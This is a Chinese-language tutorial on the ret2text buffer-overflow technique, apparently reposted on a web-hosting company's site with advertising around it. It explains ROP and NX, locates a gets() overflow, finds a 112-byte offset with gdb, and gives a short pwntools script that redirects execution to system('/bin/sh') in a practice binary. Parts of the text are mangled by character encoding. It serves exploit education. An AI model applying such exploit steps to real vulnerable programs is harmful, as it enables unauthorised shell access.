基礎(chǔ)知識(shí)：

創(chuàng)新互聯(lián)建站是一家朝氣蓬勃的網(wǎng)站建設(shè)公司。公司專注于為企業(yè)提供信息化建設(shè)解決方案。從事網(wǎng)站開(kāi)發(fā)，網(wǎng)站制作，網(wǎng)站設(shè)計(jì)，網(wǎng)站模板，微信公眾號(hào)開(kāi)發(fā)，軟件開(kāi)發(fā)，小程序開(kāi)發(fā)，10多年建站對(duì)水處理設(shè)備等多個(gè)行業(yè)，擁有豐富的網(wǎng)站維護(hù)經(jīng)驗(yàn)。

隨著 NX 保護(hù)的開(kāi)啟，以往直接向?；蛘叨焉现苯幼⑷氪a的方式難以繼續(xù)發(fā)揮效果。***者們也提出來(lái)相應(yīng)的方法來(lái)繞過(guò)保護(hù)，目前主要的是 ROP(Return Oriented Programming)，其主要思想是在棧緩沖區(qū)溢出的基礎(chǔ)上，利用程序中已有的小片段 (gadgets) 來(lái)改變某些寄存器或者變量的值，從而控制程序的執(zhí)行流程。所謂 gadgets 就是以 ret 結(jié)尾的指令序列，通過(guò)這些指令序列，我們可以修改某些地址的內(nèi)容，方便控制程序的執(zhí)行流程。

之所以稱之為 ROP，是因?yàn)楹诵脑谟诶昧酥噶罴械?ret 指令，改變了指令流的執(zhí)行順序。ROP ***一般得滿足如下條件

• 程序存在溢出，并且可以控制返回地址。

• 可以找到滿足條件的 gadgets 以及相應(yīng) gadgets 的地址。

如果 gadgets 每次的地址是不固定的，那我們就需要想辦法動(dòng)態(tài)獲取對(duì)應(yīng)的地址了。

今天我們講一下程序在開(kāi)啟NX（NX即No-eXecute（不可執(zhí)行）的意思，NX（DEP）的基本原理是將數(shù)據(jù)所在內(nèi)存頁(yè)標(biāo)識(shí)為不可執(zhí)行，當(dāng)程序溢出成功轉(zhuǎn)入shellcode時(shí)，程序會(huì)嘗試在數(shù)據(jù)頁(yè)面上執(zhí)行指令，此時(shí)CPU就會(huì)拋出異常，而不是去執(zhí)行惡意指令。）時(shí)如何溢出。

原理 ?

ret2text 即控制程序執(zhí)行程序本身已有的的代碼 (.text)。其實(shí)，這種***方法是一種籠統(tǒng)的描述。我們控制執(zhí)行程序已有的代碼的時(shí)候也可以控制程序執(zhí)行好幾段不相鄰的程序已有的代碼 (也就是 gadgets)，這就是我們所要說(shuō)的 ROP。

這時(shí)，我們需要知道對(duì)應(yīng)返回的代碼的位置。當(dāng)然程序也可能會(huì)開(kāi)啟某些保護(hù)，我們需要想辦法去繞過(guò)這些保護(hù)。

第一步：反匯編代碼查看代碼結(jié)構(gòu)

我們講程序放到IDA中進(jìn)行分析：

我們發(fā)現(xiàn)在代碼中出現(xiàn)了gets函數(shù)(gets()唯一的參數(shù)是words，它無(wú)法檢查是否裝得下輸入行。數(shù)組名會(huì)轉(zhuǎn)換成該數(shù)組首元素的地址，因此gets()函數(shù)只知道數(shù)組的開(kāi)始處，并不知道數(shù)組中有多少個(gè)元素。如果輸入的字符串過(guò)長(zhǎng)，會(huì)導(dǎo)致緩沖區(qū)溢出(buffer overflow)).

第二步：測(cè)試溢出偏移量

講程序加載到GDB中進(jìn)行調(diào)試：gdb ./xxxx

執(zhí)行命令：pattern create 200 用來(lái)創(chuàng)建字符串，幫助我們定位溢出偏移量。

執(zhí)行命令：r

輸入我們剛才創(chuàng)建的200個(gè)字符

此時(shí)會(huì)爆出一個(gè)地址，根據(jù)這個(gè)地址來(lái)得到偏移量

執(zhí)行命令pattern offset 0x41384141

發(fā)現(xiàn)偏移量是112，我們此時(shí)也知道了system("/bin/sh")的地址，將?？臻g的函數(shù)返回地址改為system("/bin/sh")即可跳轉(zhuǎn)到此處執(zhí)行，從而獲取shell。地址一定是0x0804863a，因?yàn)閳?zhí)行完該行之后system函數(shù)才知道參數(shù)是"/bin/sh"。

PS:也可以使用：objdump -d ./ret2text |grep system來(lái)查看地址

我們來(lái)看下代碼：

from pwn import *

elf = ELF('./ret2text')

p = process('./ret2text')

payload = 112 * 'a' + p32(0x804863a)

p.sendline(payload)

p.interactive()

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。

名稱欄目：緩沖區(qū)溢出-基本ROP-ret2text-創(chuàng)新互聯(lián)
文章位置：http://chinadenli.net/article28/dgjhcp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供手機(jī)網(wǎng)站建設(shè)、移動(dòng)網(wǎng)站建設(shè)、企業(yè)網(wǎng)站制作、微信公眾號(hào)、網(wǎng)站維護(hù)、建站公司

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)